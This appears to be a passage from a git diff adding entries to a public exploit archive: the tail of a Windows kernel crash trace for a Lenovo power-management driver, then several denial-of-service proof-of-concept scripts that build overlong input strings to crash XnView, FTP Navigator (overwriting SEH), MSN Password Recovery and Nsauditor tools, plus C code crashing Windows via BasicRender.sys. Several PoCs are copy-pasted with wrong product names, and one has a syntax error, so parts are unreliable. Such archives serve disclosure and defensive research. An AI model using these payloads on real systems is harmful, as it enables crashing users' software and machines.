+iopl=0         nv up ei ng nz na pe nc
+cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000282
+nt!setjmpex+0x7f09:
+fffff804`1f27a8e9 90              nop
+_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
+02 ffffc709`dee8e460 fffff804`1f271b4f nt!setjmpex+0x735c
+02 ffffc709`dee8e460 fffff804`1f271b4f nt!setjmpex+0x735c
+rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b
+rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000
+rip=fffff8041f279d3c rsp=ffffc709dee8e460 rbp=ffffc709dee8ea10
+ r8=fffff80428bf109d  r9=ffffc709dee8ec50 r10=0000000000000000
+r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510
+r14=0000000000000000 r15=ffffc709dee8f408
+iopl=0         nv up ei ng nz na pe nc
+cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000282
+nt!setjmpex+0x735c:
+fffff804`1f279d3c b801000000      mov     eax,1
+_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
+03 ffffc709`dee8e4a0 fffff804`1f1ca460 nt!_chkstk+0x41f
+03 ffffc709`dee8e4a0 fffff804`1f1ca460 nt!_chkstk+0x41f
+rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b
+rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000
+rip=fffff8041f271b4f rsp=ffffc709dee8e4a0 rbp=ffffc709dee8ea10
+ r8=fffff80428bf109d  r9=ffffc709dee8ec50 r10=0000000000000000
+r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510
+r14=0000000000000000 r15=ffffc709dee8f408
+iopl=0         nv up ei ng nz na pe nc
+cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000282
+nt!_chkstk+0x41f:
+fffff804`1f271b4f 0f1f00          nop     dword ptr [rax]
+_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
+04 ffffc709`dee8e4d0 fffff804`1f0d7c24 nt!RtlUnwindEx+0x3440
+04 ffffc709`dee8e4d0 fffff804`1f0d7c24 nt!RtlUnwindEx+0x3440
+rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b
+rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000
+rip=fffff8041f1ca460 rsp=ffffc709dee8e4d0 rbp=ffffc709dee8ea10
+ r8=fffff80428bf109d  r9=ffffc709dee8ec50 r10=0000000000000000
+r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510
+r14=0000000000000000 r15=ffffc709dee8f408
+iopl=0         nv up ei ng nz na pe nc
+cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000282
+nt!RtlUnwindEx+0x3440:
+fffff804`1f1ca460 8bd0            mov     edx,eax
+_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
+05 ffffc709`dee8ec20 fffff804`1f27a9c2 nt!ExReleaseAutoExpandPushLockExclusive+0x264
+05 ffffc709`dee8ec20 fffff804`1f27a9c2 nt!ExReleaseAutoExpandPushLockExclusive+0x264
+rax=ffffc709dee8e420 rbx=ffffc709dee8f408 rcx=000000000000003b
+rdx=00000000c0000005 rsi=ffffc709dee8ec50 rdi=0000000000000000
+rip=fffff8041f0d7c24 rsp=ffffc709dee8ec20 rbp=ffffc709dee8f150
+ r8=fffff80428bf109d  r9=ffffc709dee8ec50 r10=0000000000000000
+r11=000000001f0b5000 r12=000000000010001f r13=ffffca04c1ca8d40
+r14=ffffc709dee8f4b0 r15=0000000000000000
+iopl=0         nv up ei ng nz na pe nc
+cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000282
+nt!ExReleaseAutoExpandPushLockExclusive+0x264:
+fffff804`1f0d7c24 84c0            test    al,al
+_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
+06 ffffc709`dee8f2d0 fffff804`1f276cae nt!setjmpex+0x7fe2
+06 ffffc709`dee8f2d0 fffff804`1f276cae nt!setjmpex+0x7fe2
+rax=ffffc709dee8e420 rbx=ffffca04ca8f80a0 rcx=000000000000003b
+rdx=00000000c0000005 rsi=ffffca04ca8f8170 rdi=0000000000000000
+rip=fffff8041f27a9c2 rsp=ffffc709dee8f2d0 rbp=ffffc709dee8f530
+ r8=fffff80428bf109d  r9=ffffc709dee8ec50 r10=0000000000000000
+r11=000000001f0b5000 r12=0000000000000000 r13=ffffca04c1ca8d40
+r14=0000000000000002 r15=0000000000000000
+iopl=0         nv up ei ng nz na pe nc
+cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000282
+nt!setjmpex+0x7fe2:
+fffff804`1f27a9c2 488d8c2400010000 lea     rcx,[rsp+100h]
+_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
+07 ffffc709`dee8f4b0 fffff804`28bf109d nt!setjmpex+0x42ce
+07 ffffc709`dee8f4b0 fffff804`28bf109d nt!setjmpex+0x42ce
+rax=ffffc709dee8e420 rbx=ffffca04ca8f80a0 rcx=000000000000003b
+rdx=00000000c0000005 rsi=ffffca04ca8f8170 rdi=0000000000000000
+rip=fffff8041f276cae rsp=ffffc709dee8f4b0 rbp=ffffc709dee8f530
+ r8=fffff80428bf109d  r9=ffffc709dee8ec50 r10=0000000000000000
+r11=000000001f0b5000 r12=0000000000000000 r13=ffffca04c1ca8d40
+r14=0000000000000002 r15=0000000000000000
+iopl=0         nv up ei ng nz na pe nc
+cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000282
+nt!setjmpex+0x42ce:
+fffff804`1f276cae 440f20c0        mov     rax,cr8
+_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
+08 ffffc709`dee8f640 fffff804`28bf5060 pmdrvs+0x109d
+08 ffffc709`dee8f640 fffff804`28bf5060 pmdrvs+0x109d
+rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8
+rdx=ffffca04ca8f8170 rsi=ffffca04ca8f8170 rdi=0000000000000000
+rip=fffff80428bf109d rsp=ffffc709dee8f640 rbp=ffffca04cc188290
+ r8=000000000000000e  r9=ffffca04c1ca8d40 r10=fffff80428bf5020
+r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40
+r14=0000000000000002 r15=0000000000000000
+iopl=0         nv up ei ng nz na pe nc
+cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000282
+pmdrvs+0x109d:
+fffff804`28bf109d 8b07            mov     eax,dword ptr [rdi] ds:002b:00000000`00000000=????????
+_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
+09 ffffc709`dee8f6c0 fffff804`1f12dba9 pmdrvs+0x5060
+09 ffffc709`dee8f6c0 fffff804`1f12dba9 pmdrvs+0x5060
+rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8
+rdx=ffffca04ca8f8170 rsi=0000000000000001 rdi=0000000000000000
+rip=fffff80428bf5060 rsp=ffffc709dee8f6c0 rbp=ffffca04cc188290
+ r8=000000000000000e  r9=ffffca04c1ca8d40 r10=fffff80428bf5020
+r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40
+r14=0000000000000002 r15=0000000000000000
+iopl=0         nv up ei ng nz na pe nc
+cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000282
+pmdrvs+0x5060:
+fffff804`28bf5060 eb28            jmp     pmdrvs+0x508a (fffff804`28bf508a)
+_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
+0a ffffc709`dee8f6f0 fffff804`1f6abb11 nt!IofCallDriver+0x59
+0a ffffc709`dee8f6f0 fffff804`1f6abb11 nt!IofCallDriver+0x59
+rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8
+rdx=ffffca04ca8f8170 rsi=0000000000000001 rdi=ffffca04cc188290
+rip=fffff8041f12dba9 rsp=ffffc709dee8f6f0 rbp=ffffca04cc188290
+ r8=000000000000000e  r9=ffffca04c1ca8d40 r10=fffff80428bf5020
+r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40
+r14=0000000000000002 r15=0000000000000000
+iopl=0         nv up ei ng nz na pe nc
+cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000282
+nt!IofCallDriver+0x59:
+fffff804`1f12dba9 4883c438        add     rsp,38h
+_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
+0b ffffc709`dee8f730 fffff804`1f6d763c nt!NtQueryInformationFile+0x1071
+0b ffffc709`dee8f730 fffff804`1f6d763c nt!NtQueryInformationFile+0x1071
+rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8
+rdx=ffffca04ca8f8170 rsi=0000000000000001 rdi=ffffca04cc188290
+rip=fffff8041f6abb11 rsp=ffffc709dee8f730 rbp=ffffca04cc188290
+ r8=000000000000000e  r9=ffffca04c1ca8d40 r10=fffff80428bf5020
+r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40
+r14=0000000000000002 r15=0000000000000000
+iopl=0         nv up ei ng nz na pe nc
+cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000282
+nt!NtQueryInformationFile+0x1071:
+fffff804`1f6abb11 448bf0          mov     r14d,eax
+_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
+0c ffffc709`dee8f7e0 fffff804`1f64c356 nt!NtClose+0xffc
+0c ffffc709`dee8f7e0 fffff804`1f64c356 nt!NtClose+0xffc
+rax=fffff80428bf5020 rbx=ffffca04cc188290 rcx=ffffc709dee8f6d8
+rdx=ffffca04ca8f8170 rsi=0000000000000000 rdi=ffffca04ca8f80a0
+rip=fffff8041f6d763c rsp=ffffc709dee8f7e0 rbp=ffffc709dee8fa80
+ r8=000000000000000e  r9=ffffca04c1ca8d40 r10=fffff80428bf5020
+r11=ffffc709dee8f6b8 r12=ffffca04ca8f81b8 r13=fffff780000002dc
+r14=0000000000000000 r15=0000000000000000
+iopl=0         nv up ei ng nz na pe nc
+cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000282
+nt!NtClose+0xffc:
+fffff804`1f6d763c eb25            jmp     nt!NtClose+0x1023 (fffff804`1f6d7663)
+_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
+0d ffffc709`dee8f920 fffff804`1f27a305 nt!NtDeviceIoControlFile+0x56
+0d ffffc709`dee8f920 fffff804`1f27a305 nt!NtDeviceIoControlFile+0x56
+rax=fffff80428bf5020 rbx=ffffca04c88b3080 rcx=ffffc709dee8f6d8
+rdx=ffffca04ca8f8170 rsi=000000000068fd18 rdi=ffffc709dee8f9a8
+rip=fffff8041f64c356 rsp=ffffc709dee8f920 rbp=ffffc709dee8fa80
+ r8=000000000000000e  r9=ffffca04c1ca8d40 r10=fffff80428bf5020
+r11=ffffc709dee8f6b8 r12=0000000000000000 r13=0000000000000010
+r14=0000000000000000 r15=0000000000000000
+iopl=0         nv up ei ng nz na pe nc
+cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000282
+nt!NtDeviceIoControlFile+0x56:
+fffff804`1f64c356 4883c468        add     rsp,68h
+_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
+0e ffffc709`dee8f990 00007fff`33aaf844 nt!setjmpex+0x7925
+0e ffffc709`dee8f990 00007fff`33aaf844 nt!setjmpex+0x7925
+rax=fffff80428bf5020 rbx=ffffca04c88b3080 rcx=ffffc709dee8f6d8
+rdx=ffffca04ca8f8170 rsi=000000000068fd18 rdi=ffffc709dee8f9a8
+rip=fffff8041f27a305 rsp=ffffc709dee8f990 rbp=ffffc709dee8fa80
+ r8=000000000000000e  r9=ffffca04c1ca8d40 r10=fffff80428bf5020
+r11=ffffc709dee8f6b8 r12=0000000000000000 r13=0000000000000010
+r14=0000000000000000 r15=0000000000000000
+iopl=0         nv up ei ng nz na pe nc
+cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000282
+nt!setjmpex+0x7925:
+fffff804`1f27a305 0f1f00          nop     dword ptr [rax]
+_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
+0f 00000000`0068fcf8 00000000`00000000 0x00007fff`33aaf844
+0f 00000000`0068fcf8 00000000`00000000 0x00007fff`33aaf844
+rax=fffff80428bf5020 rbx=0000000000000000 rcx=ffffc709dee8f6d8
+rdx=ffffca04ca8f8170 rsi=00000000deadbeef rdi=000000000000004c
+rip=00007fff33aaf844 rsp=000000000068fcf8 rbp=000000000000004c
+ r8=000000000000000e  r9=ffffca04c1ca8d40 r10=fffff80428bf5020
+r11=ffffc709dee8f6b8 r12=0000000000000000 r13=0000000000000010
+r14=0000000000000000 r15=0000000000000000
+iopl=0         nv up ei ng nz na pe nc
+cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000282
+00007fff`33aaf844 ??              ???
+_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
+00 ffffc709`dee8e318 fffff804`1f27a8e9 nt!KeBugCheckEx
+
+# Mitigation
+
+Update to Lenovo Power Management driver version 1.67.17.48 or higher
\ No newline at end of file
diff --git a/exploits/windows/dos/47786.py b/exploits/windows/dos/47786.py
new file mode 100755
index 000000000..d2a5f2072
--- /dev/null
+++ b/exploits/windows/dos/47786.py
@@ -0,0 +1,52 @@
+# Exploit Title: XnView 2.49.1 - 'Research' Denial of Service (PoC)
+# Exploit Author : ZwX
+# Exploit Date: 2019-12-17
+# Vendor Homepage :  http://www.xnview.com
+# Link Software : https://www.xnview.com/fr/xnview/#downloads
+# Tested on OS: Windows 7
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install XnView
+2.Open the XnView for Windows tools 
+3.Run the python operating script that will create a file (poc.txt)
+4.Run the software " Tools -> Research -> A search window opens "
+5.Copy and paste the characters in the file (poc.txt)
+6.Paste the characters in the field 'File Name' and  'In' click on 'Research'
+7.XnView for Windows Crashed
+'''
+
+#!/usr/bin/python
+
+DoS=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"
+"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"
+"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"
+"\x40\x4f\x73\x61\x6e\x64\x61\x4d\x61\x6c\x69\x74\x68\x00\x00\x00"
+"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x74\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41")
+
+poc = DoS
+file = open("poc.txt,"w")
+file.write(poc)
+file.close()
+
+print "POC Created by ZwX"
\ No newline at end of file
diff --git a/exploits/windows/dos/47794.py b/exploits/windows/dos/47794.py
new file mode 100755
index 000000000..cd30786c5
--- /dev/null
+++ b/exploits/windows/dos/47794.py
@@ -0,0 +1,26 @@
+# Exploit Title: FTP Navigator 8.03 -  'Custom Command' Denial of Service (SEH)
+# Date: 2019-12-18
+# Exploit Author: Chris Inzinga
+# Vendor Homepage: http://www.internet-soft.com/
+# Software Link: https://www.softpedia.com/dyn-postdownload.php/5edd515b8045f156a9dd48599c2539e5/5dfa4560/d0c/0/1
+# Version: 8.03
+# Tested on: Windows 7 SP1 (x86)
+
+# Steps to reproduce:
+#   1. Generate a malicious payload via the POC
+#   2. In the application click "FTP - Server" > "Custom Command"
+#   3. Paste the contents of the PoC file into the input box below SERVER LIST and press "Do it!"
+#   4. Observe a program DOS crash, overwriting SEH 
+
+#!/usr/bin/python
+
+payload = "A" * 4108 + "B" * 4 + "C" * 40
+
+try:
+    fileCreate =open("exploit.txt","w")
+    print("[x] Creating file")
+    fileCreate.write(payload)
+    fileCreate.close()
+    print("[x] File created")
+except:
+    print("[!] File failed to be created")
\ No newline at end of file
diff --git a/exploits/windows/dos/47797.c b/exploits/windows/dos/47797.c
new file mode 100644
index 000000000..5acf476d0
--- /dev/null
+++ b/exploits/windows/dos/47797.c
@@ -0,0 +1,115 @@
+# Exploit Title: Microsoft Windows 10 BasicRender.sys - Denial of Service (PoC)
+# Date: 2019-12-20
+# Exploit author: vportal
+# Vendor homepage: http://www.microsoft.com
+# Version: Windows 10 1803 x86
+# Tested on: Windows 10 1803 x86
+# CVE: N/A
+
+# A Null pointer deference exists in the WARPGPUCMDSYNC function of the
+# BasicRender.sys driver. An unprivileged user can trigger the vulnerability
+# to crash the system and deny the service to the rest of the users.
+
+*PoC:*
+
+#include <Windows.h>
+#include <d3dkmthk.h>
+
+D3DKMT_CREATEDEVICE* device = NULL;
+device = new D3DKMT_CREATEDEVICE();
+
+D3DKMT_ENUMADAPTERS enumAdapter = { 0 };
+D3DKMTEnumAdapters(&enumAdapter);
+device->hAdapter = enumAdapter.Adapters[1].hAdapter;
+logger(log_counter, "EnumAdapter");
+
+D3DKMTCreateDevice(device);
+
+D3DKMT_CREATECONTEXTVIRTUAL* contextVirtual = NULL;
+contextVirtual = new D3DKMT_CREATECONTEXTVIRTUAL();
+memset(contextVirtual, 0, sizeof(D3DKMT_CREATECONTEXTVIRTUAL));
+
+contextVirtual->hDevice = device->hDevice;
+
+char data[0x200] = { 0 };
+memset(data, 0xff, 0x200);
+
+contextVirtual->PrivateDriverDataSize = 0x200;
+contextVirtual->pPrivateDriverData = data;
+
+contextVirtual->ClientHint = D3DKMT_CLIENTHINT_DX10;
+contextVirtual->Flags.InitialData = 0x000001;
+contextVirtual->Flags.NullRendering = 0x0;
+
+D3DKMT_SUBMITCOMMAND* submitCommand = NULL;
+submitCommand = new D3DKMT_SUBMITCOMMAND();
+
+submitCommand->BroadcastContext[0] = 0x40000240;
+
+for (int i = 0; i < 0x10; i++)
+     submitCommand->WrittenPrimaries[i] = 0x0;
+
+submitCommand->PresentHistoryToken = 0x100;
+submitCommand->Commands = 0x004b39;
+submitCommand->CommandLength = 0x00000d;
+submitCommand->BroadcastContext[0] = contextVirtual->hContext;
+submitCommand->BroadcastContextCount = 0x1;
+submitCommand->Flags.PresentRedirected = 0x1;
+
+submitCommand->PrivateDriverDataSize = 0x130;
+
+char* PrivateData = NULL;
+PrivateData = new char[submitCommand->PrivateDriverDataSize];
+memset(PrivateData, 0x00, submitCommand->PrivateDriverDataSize);
+
+*(DWORD*)(PrivateData + 0x118) = 0x434e5953;
+*(DWORD*)(PrivateData + 0x11c) = 0x18;
+*(DWORD*)(PrivateData + 0x120) = 0x000110;
+*(DWORD*)(PrivateData + 0x124) = 0x000420;
+*(DWORD*)(PrivateData + 0x128) = 0x0;
+*(DWORD*)(PrivateData + 0x12c) = 0x000428;
+
+submitCommand->pPrivateDriverData = PrivateData;
+
+D3DKMTSubmitCommand(submitCommand);
+
+
+--------------------------------------------------------------------------
+*Crash dump*:
+
+STACK_TEXT:
+8afae92c 8fe82cb2 8afae958 fffffffd 0000048c
+BasicRender!WARPGPUCMDSYNC::WARPGPUCMDSYNC+0xc
+8afae94c 8fe8267d bb26afe8 00000000 bb26afe0
+BasicRender!WARPKMCONTEXT::SubmitVirtual+0x4a
+8afae9a8 8fca6af5 91e05000 bb26afe0 93dfc000
+BasicRender!WarpKMSubmitCommandVirtual+0x87
+8afae9fc 8fc2a934 8afaea68 8afaeac0 92b19db6
+dxgkrnl!ADAPTER_RENDER::DdiSubmitCommandVirtual+0x115
+8afaea08 92b19db6 90114c30 8afaea68 b78da008
+dxgkrnl!ADAPTER_RENDER_DdiSubmitCommandVirtual+0x10
+8afaeac0 92b4ac94 93dfc000 cd6ee008 cc6d8860
+dxgmms2!VidSchiSendToExecutionQueue+0x526
+8afaeb90 92b764a9 00000000 945f5a80 00000000
+dxgmms2!VidSchiSubmitRenderVirtualCommand+0x534
+8afaebb8 81ee80bc 93dfc000 28e5f697 00000000
+dxgmms2!VidSchiWorkerThread+0x1a1
+8afaebf0 81fe952d 92b76308 93dfc000 00000000 nt!PspSystemThreadStartup+0x4a
+8afaebfc 00000000 00000000 bbbbbbbb bbbbbbbb nt!KiThreadStartup+0x15
+
+eax=8afae958 ebx=00000000 ecx=00000000 edx=00000000 *esi*=00000000
+edi=bb26afd8
+eip=8fe8386c esp=8afae920 ebp=8afae92c iopl=0         nv up ei pl zr na pe
+nc
+cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000
+efl=00010246
+BasicRender!WARPGPUCMDSYNC::WARPGPUCMDSYNC+0xc:
+8fe8386c c7061060e88f    mov     dword ptr [esi],offset
+BasicRender!WARPGPUCMDSYNC::`vftable' (8fe86010) ds:0023:00000000=????????
+Resetting default scope
+
+--------------------------------------------------------------------------------
+
+The vulnerability has only been tested  in Windows 10 x86 1803.
+CVSS Base Score: 5.5
+Credit: Victor Portal
\ No newline at end of file
diff --git a/exploits/windows/dos/47839.py b/exploits/windows/dos/47839.py
new file mode 100755
index 000000000..965128414
--- /dev/null
+++ b/exploits/windows/dos/47839.py
@@ -0,0 +1,22 @@
+# Exploit Title: MSN Password Recovery 1.30 - Denial of Service (PoC)
+# Date: 2020-01-02
+# Vendor Homepage: https://www.top-password.com/
+# Software Link: https://www.top-password.com/download/MSNPRSetup.exe
+# Exploit Author: Gokkulraj
+# Tested Version: v1.30
+# Tested on: Windows 7 x64
+
+# 1.- Download and install MSN Password Recovery
+# 2.- Run python code : MSN Password Recovery.py
+# 3.- Open CRASH.txt and copy content to clipboard
+# 4.- Open MSN Password Recovery and Click 'EnterKey'
+# 5.- Paste the content of CRASH.txt into the Field: 'User Name and
+Registration Code'
+# 6.- click 'OK' you will see a crash.
+
+#!/usr/bin/env python
+Dos= "\x41" * 9000
+myfile=open('CRASH.txt','w')
+myfile.writelines(Dos)
+myfile.close()
+print("File created")
\ No newline at end of file
diff --git a/exploits/windows/dos/47848.py b/exploits/windows/dos/47848.py
new file mode 100755
index 000000000..061177e2e
--- /dev/null
+++ b/exploits/windows/dos/47848.py
@@ -0,0 +1,33 @@
+# Exploit Title: NetShareWatcher 1.5.8.0 - 'Name' Denial Of Service
+# Exploit Author : Ismail Tasdelen
+# Exploit Date: 2020-01-06
+# Vendor Homepage : http://www.nsauditor.com/
+# Link Software : http://netsharewatcher.nsauditor.com/downloads/NetShareWatcher_setup.exe
+# Tested on OS: Windows 10
+# CVE : N/A
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install NetShareWatcher
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Register -> Enter Registration Code
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Name' and click on 'Ok'
+6.NetShareWatcher Crashed
+'''
+
+#!/usr/bin/python
+    
+buffer = "A" * 1000
+ 
+payload = buffer
+try:
+    f=open("poc.txt","w")
+    print("[+] Creating %s bytes evil payload." %len(payload))
+    f.write(payload)
+    f.close()
+    print("[+] File created!")
+except:
+    print("File cannot be created.")
\ No newline at end of file
diff --git a/exploits/windows/dos/47853.py b/exploits/windows/dos/47853.py
new file mode 100755
index 000000000..bd7b43953
--- /dev/null
+++ b/exploits/windows/dos/47853.py
@@ -0,0 +1,33 @@
+# Exploit Title: NetworkSleuth 3.0.0.0 - 'Key' Denial of Service (PoC)
+# Exploit Author : Ismail Tasdelen
+# Exploit Date: 2020-01-06
+# Vendor Homepage : http://www.nsauditor.com/
+# Link Software : http://www.nsauditor.com/downloads/networksleuth_setup.exe
+# Tested on OS: Windows 10
+# CVE : N/A
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install BlueAuditor
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Register -> Enter Registration Code
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Key' and click on 'Ok'
+6.BlueAuditor Crashed
+'''
+
+#!/usr/bin/python
+    
+buffer = "A" * 1000
+ 
+payload = buffer
+try:
+    f=open("poc.txt","w")
+    print("[+] Creating %s bytes evil payload." %len(payload))
+    f.write(payload)
+    f.close()
+    print("[+] File created!")
+except:
+    print("File cannot be created.")
\ No newline at end of file
diff --git a/exploits/windows/dos/47855.py b/exploits/windows/dos/47855.py
new file mode 100755
index 000000000..baba1cdd5
--- /dev/null
+++ b/exploits/windows/dos/47855.py
@@ -0,0 +1,33 @@
+# Exploit Title: SpotIE 2.9.5 - 'Key' Denial of Service (PoC)
+# Exploit Author : Ismail Tasdelen
+# Exploit Date: 2020-01-06
+# Vendor Homepage : http://www.nsauditor.com/
+# Link Software : http://www.nsauditor.com/downloads/spotie_setup.exe
+# Tested on OS: Windows 10
+# CVE : N/A
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install BlueAuditor
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Register -> Enter Registration Code
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Key' and click on 'Ok'
+6.BlueAuditor Crashed
+'''
+
+#!/usr/bin/python
+    
+buffer = "A" * 1000
+ 
+payload = buffer
+try:
+    f=open("poc.txt","w")
+    print("[+] Creating %s bytes evil payload." %len(payload))
+    f.write(payload)
+    f.close()
+    print("[+] File created!")
+except:
+    print("File cannot be created.")
\ No newline at end of file
diff --git a/exploits/windows/dos/47856.py b/exploits/windows/dos/47856.py
new file mode 100755
index 000000000..317ff05ae
--- /dev/null
+++ b/exploits/windows/dos/47856.py
@@ -0,0 +1,33 @@
+# Exploit Title: Dnss Domain Name Search Software - 'Key' Denial of Service (PoC)
+# Exploit Author : Ismail Tasdelen
+# Exploit Date: 2020-01-06
+# Vendor Homepage : http://www.nsauditor.com/
+# Link Software : http://www.nsauditor.com/downloads/networksleuth_setup.exe
+# Tested on OS: Windows 10
+# CVE : N/A
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install Dnss
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Register -> Enter Registration Code
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Key' and click on 'Ok'
+6.Dnss Crashed
+'''
+
+#!/usr/bin/python
+    
+buffer = "A" * 1000
+ 
+payload = buffer
+try:
+    f=open("poc.txt","w")
+    print("[+] Creating %s bytes evil payload." %len(payload))
+    f.write(payload)
+    f.close()
+    print("[+] File created!")
+except:
+    print("File cannot be created.")
\ No newline at end of file
diff --git a/exploits/windows/dos/47857.py b/exploits/windows/dos/47857.py
new file mode 100755
index 000000000..888688818
--- /dev/null
+++ b/exploits/windows/dos/47857.py
@@ -0,0 +1,33 @@
+# Exploit Title: BlueAuditor 1.7.2.0 - 'Name' Denial of Service (PoC)
+# Exploit Author : Ismail Tasdelen
+# Exploit Date: 2020-01-06
+# Vendor Homepage : http://www.nsauditor.com/
+# Link Software : http://www.nsauditor.com/downloads/blueauditor_setup.exe
+# Tested on OS: Windows 10
+# CVE : N/A
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install BlueAuditor
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Register -> Enter Registration Code
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Name' and click on 'Ok'
+6.BlueAuditor Crashed
+'''
+
+#!/usr/bin/python
+    
+buffer = "A" * 1000
+ 
+payload = buffer
+try:
+    f=open("poc.txt","w")
+    print("[+] Creating %s bytes evil payload." %len(payload))
+    f.write(payload)
+    f.close()
+    print("[+] File created!")
+except:
+    print("File cannot be created.")
\ No newline at end of file
diff --git a/exploits/windows/dos/47859.py b/exploits/windows/dos/47859.py
new file mode 100755
index 000000000..65d1339c1
--- /dev/null
+++ b/exploits/windows/dos/47859.py
@@ -0,0 +1,33 @@
+# Exploit Title: ShareAlarmPro Advanced Network Access Control - 'Key' Denial of Service (PoC)
+# Exploit Author : Ismail Tasdelen
